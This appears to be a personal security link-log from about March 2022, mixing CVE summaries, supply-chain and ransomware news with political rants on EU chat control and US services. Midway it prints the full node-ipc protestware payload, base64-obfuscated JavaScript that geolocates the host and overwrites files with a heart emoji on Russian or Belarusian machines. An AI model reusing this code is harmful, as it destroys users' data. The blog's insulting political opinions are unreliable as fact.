Notes

A Stack-based buffer overflow vulnerability in the SonicOS via HTTP request allows a remote unauthenticated attacker to cause Denial of Service (DoS) or potentially results in code execution in the firewall.

SonicWall PSIRT is not aware of active exploitation in the wild. No reports of a PoC have been made public and malicious use of this vulnerability has not been reported to SonicWall.

And SonicWall strongly urges organizations using impacted SonicWall firewalls listed below to follow the provided guidance.

NOTE: This vulnerability ONLY impacts the “web management” interface, the SonicOS SSLVPN interface is not impacted. CVE-2022-22274 - Unauthenticated Stack-Based Buffer Overflow Vulnerability In SonicOS

This is a hardening checklist that can be used in private and business environments for hardening Windows 10. The checklist can be used for all Windows versions, but in Windows 10 Home the Group Policy Editor is not integrated and the adjustment must be done directly in the registry. For this, there is the HailMary mode from HardeningKitty.

The settings should be seen as security and privacy recommendation and should be carefully checked whether they will affect the operation of your infrastructure or impact the usability of key functions. It is important to weigh security against usability. HardeningKitty and Windows 10 Hardening

Infoooze is an Open-source intelligence (OSINT) tool in NodeJs. It provides various modules that allow efficient searches. Infoooze

I’d link some screenshots into the “leaked” public files but it’s just not worth my time. Feel free to dig in if you have the time.

Remember when Anony🐭 distributed a copy of the VLC player with their “hacked” data? Yeah.

The JFrog Security research team continuously monitors popular open source software (OSS) repositories with our automated tooling to avert potential software supply chain security threats, and reports any vulnerabilities or malicious packages discovered to repository maintainers and the wider community.

Two days ago, several of our automated analyzers started alerting on a set of packages in the npm Registry. This particular set of packages steadily grew over a few days, from about 50 packages to more than 200 packages (as of March 21st). Large-scale npm attack targets Azure developers with malicious packages

Why? Well, partly because we have an unlimited Splunk license, but also because we couldn’t find the answer to the question: “How long do you have until ransomware encrypts your systems?” This seems like knowledge that organizations could use to organize their defenses. If organizations have more than 20 hours before ransomware finishes encrypting, they might choose to focus on detecting and mitigating ransomware after infection. If ransomware encrypts an entire system in 52 seconds, organizations should probably respond earlier in the ransomware lifecycle.

In our initial hypothesis, we asserted that if ransomware executes on a system, then it’s too late for an organization to respond effectively. We conducted a literature review of ransomware encryption speed and only uncovered work that was encyclopedic in scope from one of the ransomware groups themselves. Gone in 52 Seconds … and 42 Minutes: A Comparative Analysis of Ransomware Encryption Speed

IMSI catchers are one of the most effective surveillance techniques of all time. They’re used by police, governments and criminals to spy on victim’s phones. This spy tech is rarely deployed with a warrant. Western governments buy commercial products from US companies like the “Stingray” from Harris Corp. Criminals can also buy IMSI catchers, from unregulated online Chinese and Israeli vendors. These IMSI catchers have been used for corporate espionage and blackmail. They’ve been found at embassies, airports, political protests and sports events.

IMSI catchers work by intercepting the traffic from all phones in an area. Operators can track a victim’s location, read their SMS, listen to phone calls and intercept data. An attacker can target thousands of devices. IMSI catchers can be mounted on people, cars or airplanes that can spy on entire cities at once. How to detect IMSI catchers

Successful exploitation of this vulnerability can lead to the leak of user’s secrets stored inside a system environment variables. A security bug was found in Chromium 92 version and patched in 97 version. There are several web browsers based on the chromium engine, for instance, Google Chrome, Microsoft Edge, Opera, and Brave. All of them were vulnerable, except for Brave. The vulnerability is in the File system access API, more specifically in window.showSaveFilePicker() method. CVE-2022-0337 System environment variables leak on Google Chrome, Microsoft Edge and Opera

→ in reply to @note#1647515445

Think of the children! Speaking of that, what’s “prince” Andrew doing nowadays?

As if anyone still believes Europe is a place where free speech is protected by law:

On 30 March 2022 the EU Commission intends to make a second legislative proposal, which is to force all providers of email, messaging and chat services to comprehensively search all private messages in the absence of any suspicion.

According to the case-law of the European Court of Justice the permanent and comprehensive automated analysis of private communications violates fundamental rights and is prohibited (paragraph 177). For this reason, Member of the European Parliament Patrick Breyer has filed a complaint against U.S. companies Facebook and Google with the data protection authorities for violating the General Data Protection Regulation. Former judge of the European Court of Justice Prof. Dr. Ninon Colneric has extensively analysed the plans and concludes in a legal assessment that the EU legislative plans on chat control are not in line with the case law of the European Court of Justice and violate the fundamental rights of all EU citizens to respect for privacy, to data protection and to freedom of expression. Chat Control - The End of the Privacy of Digital Correspondence

How does this affect you?

• All of your chat conversations and emails will be automatically searched for suspicious content. Nothing remains confidential or secret. There is no requirement of a court order or an initial suspicion for searching your messages. It occurs always and automatically.
• If an algorithms classifies the content of a message as suspicious, your private or intimate photos may be viewed by staff and contractors of international corporations and police authorities. Also your private nude photos may be looked at by people not known to you, in whose hands your photos are not safe.
• Flirts and sexting may be read by staff and contractors of international corporations and police authorities, because text recognition filters looking for “child grooming” frequently falsely flag intimate chats.
• You can falsely be reported and investigated for allegedly disseminating child sexual exploitation material. Messaging and chat control algorithms are known to flag completely legal vacation photos of children on a beach, for example. According to Swiss federal police authorities, 86% of all machine-generated reports turn out to be without merit. 40% of all criminal investigation procedures initiated in Germany for “child pornography” target minors.
• On your next trip overseas, you can expect big problems. Machine-generated reports on your communications may have been passed on to other countries, such as the USA, where there is no data privacy – with incalculable results.
• Intelligence services and hackers may be able to spy on your private chats and emails. The door will be open for anyone with the technical means to read your messages if secure encryption is removed in order to be able to screen messages.
• This is only the beginning. Once the technology for messaging and chat control has been established, it becomes very easy to use them for other purposes. And who guarantees that these incrimination machines will not be used in the future on our smart phones and laptops?

Read Patrick’s article for more information.

I deobfuscated the code above and found that if the host machine’s public ip address was from Russia or Belarus, node-ipc would proceed overwrite many files with a heart emoji recursively while traversing up parent directories. node-ipc is malware and its maintainer, Brandon Charles Miller is an idiot | blob

import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl}

Or, how to destroy your project for Internet points. Vue CLI used to depend on node-ipc 9.x, the new “code” is in node-ipc 9.2.2 and there are new versions of Vue CLI (4.5.16 and 5.0.3) that lock the dependency version.

Wow.

I think that Unity Hub uses node-ipc and because node-ipc uses the peacenotwar module, Unity Hub creates the “WITH-LOVE-FROM-AMERICA.txt” file on desktop. Unity Hub seems to be affected too and they released a new version.

Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form.

It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters.

Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. CVE-2022-0778 - Infinite loop in BN_mod_sqrt() reachable when parsing certificates

A few weeks ago, I found and reported CVE-2022-25636 - a heap out of bounds write in the Linux kernel. The bug is exploitable to achieve kernel code execution (via ROP), giving full local privilege escalation, container escape, whatever you want. CVE-2022-25636 - a heap out of bounds write in the Linux kernel

Flooding icmp6 messages of type 130 or 131 is enough to exploit a memory leak in the kernel and cause the host to go out-of-memory. The volume of traffic doesn’t need to be particularly high. Note that since the vulnerability was introduced recently (5.13) only 5.15’s stable was affected.

This vulnerability was found/fixed by Eric Dumazet.

CVE will land on MITRE’s website sometime this week.

↳ CVE-2022-0742: Remote Denial of Service on Linux Kernel >=5.13

Despite the fact that it is not a ‘real’ vulnerability, escaping privileged Docker containers is nevertheless pretty funny. And because there will always be people who will come up with reasons or excuses to run a privileged container (even though you really shouldn’t), this could really be handy at some point in the future.

As a result of the recent discovery of the cgroup_release_agent escape trick (CVE-2022-0492), I went on a search for calls to the call_usermodehelper_* family and attempted to determine which ones may be easily accessed within a container environment.

↳ Escaping privileged containers for fun

Dome is a fast and reliable python script that makes active and/or passive scan to obtain subdomains and search for open ports. This tool is recommended for bug bounty hunters and pentesters in their reconnaissance phase.

• up to 21 different OSINT sources
• easily configurable with arguments
• scan multiple domains simultaneously
• export to various formats such as text, json, html

↳ DOME - A subdomain enumeration tool

Question: When will they limit American propaganda?

Answer: *crickets*

Don’t use DuckDuckGo. Microsoft. Google. Facebook. Oracle. Github. Gitlab. Don’t use any USA-based services, today they might exist for you, will they exist tomorrow? Do you trust them? Don’t use cesspools like Reddit and Twitter. Get your news from neutral places, not Bezoshington Post and New War Times. Decentralize, rationalize and think, please.

Who could have guessed that Russians would just simply create new services that are not even hard to set up after NSA Anonymoose targeting their network infrastructure and slandering them? I am shocked, shocked I say! I always thought social media mobs were a good way of handling foreign policy.

Oh, journalists shitheads, remember that if you are removing Google Tag Manager from your website it means that you are disconnecting from the Internet.

Internet makes everyone, even professors and doctors, channel their inner ape.

I noticed this dynamic a while ago. Humans simply do not operate correctly if they can hide behind their actions. Ever. You will not find people who can say difficult truths online, because online you can always choose the easier path and just screech and promote your own agenda. It’s inherently impossible. Yet we’re making the Internet a bigger thing every year. The only reason civilization was able to develop is that people were responsible for their actions. Now, that is gone.

“Harmless shitposting” might actually destroy the intellectual growth of our species, because life is today more about the Internet than real life.

4chan anons preaching the truth once more.